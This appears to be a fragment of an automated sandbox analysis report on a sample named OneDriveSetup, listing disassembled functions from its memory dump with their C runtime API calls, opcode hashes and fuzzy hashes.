                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _malloc$AllocateHeap
                                                                                                                                                                        • String ID: 1.2.3
                                                                                                                                                                        • API String ID: 680241177-2310465506
                                                                                                                                                                        • Opcode ID: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
                                                                                                                                                                        • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                                                        • Opcode Fuzzy Hash: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
                                                                                                                                                                        • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3886058894-0
                                                                                                                                                                        • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                        • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                                                                        • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                        • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                                                                        APIs
                                                                                                                                                                        • __getptd.LIBCMT ref: 00414744
                                                                                                                                                                          • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                          • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                        • __getptd.LIBCMT ref: 0041475B
                                                                                                                                                                        • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                                                        • __lock.LIBCMT ref: 00414779
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                        • String ID: @.B
                                                                                                                                                                        • API String ID: 3521780317-470711618
                                                                                                                                                                        • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                        • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                                                                        • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                        • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                                                                        APIs
                                                                                                                                                                        • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                                                                        • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                                                                        • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                                                                        • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                                                                        • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2805327698-0
                                                                                                                                                                        • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                        • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                                                        • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                        • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                                                        APIs
                                                                                                                                                                        • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                                                          • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                          • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                        • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                                                        • __lock.LIBCMT ref: 00414008
                                                                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                                                        • InterlockedIncrement.KERNEL32(085316F0), ref: 00414050
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4271482742-0
                                                                                                                                                                        • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                        • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                                                                        • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                                                        • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                        • API String ID: 1646373207-3105848591
                                                                                                                                                                        • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                        • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                                                                        • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                                                                        • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                                                                        APIs
                                                                                                                                                                        • __fileno.LIBCMT ref: 0040C77C
                                                                                                                                                                        • __locking.LIBCMT ref: 0040C791
                                                                                                                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2395185920-0
                                                                                                                                                                        • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                        • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                                                                        • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                                                                        • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _fseek_malloc_memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 208892515-0
                                                                                                                                                                        • Opcode ID: 6f84d9cc9673cc99cf3f73f605a11d8361332ed7cabd46e1548c12b7ae2e097d
                                                                                                                                                                        • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                                                                        • Opcode Fuzzy Hash: 6f84d9cc9673cc99cf3f73f605a11d8361332ed7cabd46e1548c12b7ae2e097d
                                                                                                                                                                        • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                                                                        APIs
                                                                                                                                                                        • __flush.LIBCMT ref: 0040BB6E
                                                                                                                                                                        • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                                                                        • __locking.LIBCMT ref: 0040BB95
                                                                                                                                                                        • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3240763771-0
                                                                                                                                                                        • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                        • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                                                        • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                        • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                                                        APIs
                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3058430110-0
                                                                                                                                                                        • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                        • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                                                                        • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                        • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                                                        • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                        • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                                                        • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                        • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89